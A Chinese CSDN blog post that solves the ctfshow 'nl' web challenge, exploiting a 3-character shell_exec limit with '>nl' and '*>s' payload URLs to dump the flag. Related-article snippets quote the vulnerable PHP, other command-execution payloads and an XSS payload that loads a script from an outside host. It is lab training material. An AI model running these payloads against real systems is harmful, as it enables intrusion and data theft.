ctfshow-web-【nl】难了

最新推荐文章于 2024-07-25 08:32:20 发布
最新推荐文章于 2024-07-25 08:32:20 发布
阅读量256 收藏
点赞数
分类专栏: CTF web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HAI_WD/article/details/132782659
版权
CTF 同时被 2 个专栏收录
81 篇文章 1 订阅
订阅专栏
web
37 篇文章 0 订阅
订阅专栏

0x00 前言

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取

0x01 题目

在这里插入图片描述

0x02 Write Up

这里首先看到只要当1小于4的时候才可以执行命令。这里看到题目【nl】,先查一下nl的含义,这个命令是将文件里的内容列出来

如下图所示:

在这里插入图片描述
这里需要一个技巧就是*会把文件名当做命令执行

在这里插入图片描述

所以我们需要做的事情就是先创建一个空的文件

http://5ff844d4-c818-4d7c-b76d-d7dfe864dce6.challenge.ctf.show/?1=>nl

然后通过*进行执行,这里如果ls一下就可以看到,这里的php是zzz.php,保证了nl是在zzz前面

http://5ff844d4-c818-4d7c-b76d-d7dfe864dce6.challenge.ctf.show/?1=*>s

这里下载s文件,就可以获得flag

在这里插入图片描述

0x03 other

欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。

以上

Wcbddd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webpush-java:Java的Web Push库
05-13
安装对于Gradle,将以下依赖项添加到build.gradle :compile group : ' nl.martijndwars ' , name : ' web-push ' , version : ' 5.1.1 ' 对于Maven,将以下依赖项添加到pom.xml : < groupId>nl.martijndwars ...
CTFshow_Web——【nl
Ho1aAs‘s Blog
03-17 858
文章目录知识点解题思路完 知识点 Linux读取文件指令 星号通配符 文件名作为指令执行 解题思路 先审计代码 猜测是RCE读取当前php,要求指令长度小于4 要小于4,只能用nl读取 Linux中可以将文件名作为函数和参数,通过星号通配执行 先新建一个名称是nl的文件作为指令 ?1=>nl 将右尖括号左侧的内容写入右侧文件,因此相当于新建了一个叫nl的空文件 接着读取当前的php,我们预期是执行nl xxx.php,这里由于不知道这个php的名称,无法执行 ?1=*>z 这里的操作是
ctfshow [nl]
weixin_52033041的博客
10-10 735
源码: <?php show_source(__FILE__); error_reporting(0); if(strlen($_GET[1])<4){ echo shell_exec($_GET[1]); } else{ echo "hack!!!"; } ?> 传入一个1,并执行1,并且1的长度不能超过4,最多三个 命令组装 会获得两个文件,然后使用*执行 会获得hello 此时*等于echo hello 此题提示nl,并且长度不超过四个 >nl,正
CTFSHOW【nl
qq_51558360的博客
04-03 885
应该是是RCE读取当前php,要求指令长度小于4,只能用nl读取 Linux中可以将文件名作为函数和参数,通过星号通配执行 先新建一个名称是nl的文件作为指令 ?1=>nl 将右尖括号左侧的内容写入右侧文件,因此相当于新建了一个叫nl的空文件 接着读取当前的php,我们预期是执行nl xxx.php,这里由于不知道这个php的名称,无法执行 ?1=*>z 这里的操作是: 根目录下有两个文件:新建的nl和当前的xxx.php *号代表字符串nl xxx.php,将当前目录下所有文件的名字列出.
CTFshow-命令执行
weixin_44770698的博客
06-25 2685
ctfshow-web 命令执行
ctfshow web 【nl了 wp
arcuied
12-07 232
ctfshow web 【nl了 wp
ctfshow学习记录-web入门(命令执行49-58)
龟速更新的九某人
06-07 900
ctfshow学习记录-web入门(命令执行web49-58)
CTFshow_菜鸡杯_部分wp
monster663的博客
09-01 1192
web web签到 直接看到源码 <?php if(isset($_GET['url'])){ switch (strtolower(substr($_GET['url'], 0,4))) { case 'file': echo 'file protocol do not allow'; break; case 'php:': echo 'php protocol do not allow'
FDS9958-NL-VB-MOSFET产品应用与参数解析
10-20
"FDS9958-NL-VB-MOSFET"是一款双P沟道金属氧化物半导体场效应晶体管(MOSFET),适用于负载开关等应用。该器件由VBsemi公司生产,符合无卤素标准,并采用了先进的TrenchFET®技术,确保了其在功率处理方面的高效和...
FDN357N-NL-VB-MOSFET产品应用与参数解析
10-26
FDN357N-NL是一款N沟道MOSFET(金属氧化物半导体场效应晶体管),由VBsemi公司生产。这款MOSFET设计用于低电压、高电流的应用,具有良好的开关性能和低电阻特性。以下是该产品的详细解析: 1. **技术规格**: - **...
FDC6420C-NL-VB-MOSFET产品应用与参数解析
11-01
《FDC6420C-NL-VB-MOSFET产品应用与参数解析》 FDC6420C-NL是一款集成了N+P沟道的双极型MOSFET,适用于多种电子设备的电源管理和开关控制。这款器件在设计上采用了TrenchFET技术,旨在提供高效能、低损耗的性能。其...
FDN337N-NL-VB-MOSFET产品应用与参数解析
11-06
FDN337N-NL MOSFET是一种N沟道金属氧化物半导体场效应晶体管,主要用于直流到直流转换器等应用。这款器件的特点包括采用TrenchFET®技术,这意味着它利用了沟槽结构来优化电荷存储和降低导通电阻,从而提供更高的...
[CTFSHOW]XSS入门(佛系记录)
Y4tacker的博客
12-22 3138
web316 http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E web317-319 http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28t
CTFshow web1
羽的博客
02-26 6035
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3119
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 784
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
防火墙--内容安全
banliyaoguai的博客
07-20 1238
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
气膜建筑的逃生通道设计与安全保障—轻空间
最新发布
Skansi的博客
07-25 295
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
cat -n和nl的区别
04-29
cat -n 和 nl 都是用于给文件添加行号的命令,它们的区别在于: 1. cat -n 会将所有的行都打印出来,并且在每行前面加上行号。如果文件中有空行,cat -n 也会给空行加上行号。cat -n 命令的格式如下: ``` cat -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值